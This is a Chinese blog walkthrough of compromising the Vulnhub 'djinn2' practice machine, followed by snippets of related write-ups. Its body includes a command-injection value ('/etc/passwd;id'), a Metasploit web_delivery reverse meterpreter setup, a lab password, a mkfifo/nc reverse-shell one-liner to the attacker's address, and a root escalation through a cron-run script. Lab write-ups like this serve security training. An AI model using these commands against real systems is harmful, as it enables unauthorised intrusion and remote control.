djinn2 vulnhub 渗透靶机过程

已于 2022-01-20 14:36:52 修改
阅读量2.7k 收藏
点赞数
分类专栏: 靶机渗透 文章标签: 安全 web安全 渗透测试 kali linux
于 2022-01-20 14:36:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrwangtw/article/details/122598838
版权

这次的靶机感觉挺难的,过程中看了大佬的博客,跟着做了很多次,才完成了提权到root。

靶机扫描

这次的djinn2和djinn1是一样的,打开就可以看到IP地址,我的靶机地址为10.0.2.44,攻击机10.0.2.4.

端口扫描

跟djinn1一样用匿名的方式登录ftp

把三个文件下载下来查看

有用的信息也就第一个,另外的文件没什么可用的信息。

从上面的端口扫描结果发现,开放了ssh,尝试用第一个文件登录发现不可行。

进入 1337端口,结果同djinn1一样,不能用浏览器打开,只能用curl访问

又是熟悉的游戏,这里没啥思路,直接进入5000端口,发现方法不被允许

进入7331端口,发现和djinn1的页面一样

 源代码查看也没什么信息,gobuster扫描

 进入source,发现下载了一个文件,查看这个文件

结合上面5000的get方法不被允许,考虑使用post方法,这里可以直接用hackbar构造post请求,然后到burp截包,修改

根据大佬的博客,发现username可以rce(远程代码执行) 

 

 这里获得shell的方法也是根据大佬的操作学的,使用msf反弹

第一个,利用这个漏洞,exploit/multi/script/web_delivery ,payload使用set payload linux/x64/meterpreter/reverse_tcp,设置好固定的参数,这里要注意的是target参数是linux,msf的版本不同,target的参数id也是不同的.设置好之后run

 把下面生成的wget一行复制到上面截包的地方,注意要把空格替换成+,存放位置再/tmp下面

为了防止两个+出现什么麻烦,可以把+x换成777,然后路径修改下

 

 执行

 

 然后msf就可以得到shell

搜集信息,发现有个 kdbx文件,学习之后发现是个keepass2的文件,keepass是个密码管理工具,下载这个工具,查看密码,这里密码就是creds.txt里面的7846A$56

直接ssh连接这个用户 ,搜集信息,这里学习到了一个没学过的命令netstat -ano,查看本地进程

 发现2843的端口

 本地nc连接

 这里挨个测试功能,发现到第六个功能时,会cat一下名字

 这里新建一个留言,名字设置为/etc/passwd;id,查看一下

 然后这里利用逆向连接脚本,rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.4 6666 >/tmp/f,然后本地监听即可得到shell,然后就是搜集信息

 邮件的大致意思就是有个名为clean.sh的文件会定时执行,然后我们进入这个ugtan的家目录,发现没有这个文件,那就新建一个,写入bash的shell内容

 开启后台监听,然后等几分钟,就可以得到root的shell,然后直接访问sh文件

mrwangtw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机系列测试 djinn1
08-03
靶机系列测试 djinn1】是一篇关于虚拟机安全测试的教程,主要针对初到中级水平的用户。这个靶机兼容VirtualBox和VMWare,可以通过DHCP自动分配IP地址,用户可以在登录界面直接看到IP。挑战的目标是找到并读取两个...
vulnhub靶机djinn:1渗透笔记
weixin_52268949的博客
02-16 2041
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录。根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299
红队打靶练习:DJINN: 2
分享
01-03 417
红队打靶练习:DJINN: 2 , 犹如斑虎跃起般的迫近感.....
vulnhub靶机djinn2
最新发布
waitagirl的博客
03-22 1919
vulnhub靶机djinn2
vulnhub靶机 djinn1
witwitwiter的博客
09-10 3557
vulnhub靶机 djinn:1 靶机地址djinn: 1 ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report f
vulnhub靶机-djinn2
臭nana的博客
06-29 723
1、靶机开机后得到ip:192.168.0.107 2、扫描靶机端口,比上一个靶机多了个5000端口 21 22 1337 5000 7331 root@kali:~/桌面# nmap -p- -A 192.168.0.107 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 21:53 CST Nmap scan report for 192.168.0.107 Host is up (0.00100s latency). Not s
djinn:Djinn分割键盘
04-11
Djinn分割键盘 Djinn是64键分割键盘-双4x7和4键拇指群集。 拇指下方还有一个5向触觉开关。 在奢侈方面,它具有音频,编码器支持,每键RGB和RGB余辉...... make tzarc/djinn/rev2:default 版本2a BOM: 修正: 5
开源项目-thrisp-djinn.zip
09-05
开源项目-thrisp-djinn.zip,Djinn 1.0: html templating built on standard library html/template
PyPI 官网下载 | djinn_forms-1.2.2.tar.gz
01-31
标题中的"PyPI 官网下载 | djinn_forms-1.2.2.tar.gz"指出这是一个在Python Package Index(PyPI)上发布的软件包,名为`djinn_forms`,版本为1.2.2,其分发形式是tar.gz压缩文件。PyPI是Python开发者发布自己软件包...
Python库 | djinn_core-1.2.4.tar.gz
05-14
资源分类:Python库 所属语言:Python 资源全名:djinn_core-1.2.4.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Vulnhub-djinn2
KAKA的博客
07-15 507
欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:D nmap -A -p- 192.168.67.33 共开放了 5 个端口,2
Vulnhub靶机DJINN_ 1
LainWith的博客
02-03 1549
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
Vulnhub靶机渗透 -- DJINN: 1
miko's blog
11-03 296
Vulnhub靶机渗透DJINN: 1 0x00 前言: 介系一个及其简单的靶机 非常适合新玩家对她进行渗透 (可以从这里下哦) 啊是的没了,就这些 0x01 信息收集: 进行常规的靶机安装操作后(还是用的VirtualBox),可以发现这台靶机是非常贴心的,已经告诉我们ip了,就不需要我们直接再去扫网段了 简单地用nmap扫描一下能够获得大部分内容 可以发现ssh是被过滤的,我的脑袋瓜啊一下子就想到了knockd,但是重新用sV扫全端口还是不对,要么就是没有这个漏洞,要么就是端口顺序不对 由于
vulnhub靶机-djinn
臭nana的博客
06-27 945
1、找到靶机ip:192.168.0.108
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1238
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 898
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1104
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
vulnhub-djinn1
KAKA的博客
07-14 443
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
djinn vulnhub 靶机渗透过程
mrwangtw的博客
01-19 1941
靶机下载地址:vulnhub官网 下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。 第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4 第二步,靶机端口扫描 直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43 第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件
DJinn1靶机教程:初阶到中阶的网络安全挑战
Djinn1靶机的下载地址可在VulnHub网站上找到,操作系统为Linux。在进行靶机测试时,首先需要进行信息收集,这通常包括端口扫描。 **信息收集** 信息收集的第一步是使用nmap工具进行全面扫描,例如执行`nmap -p --A ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值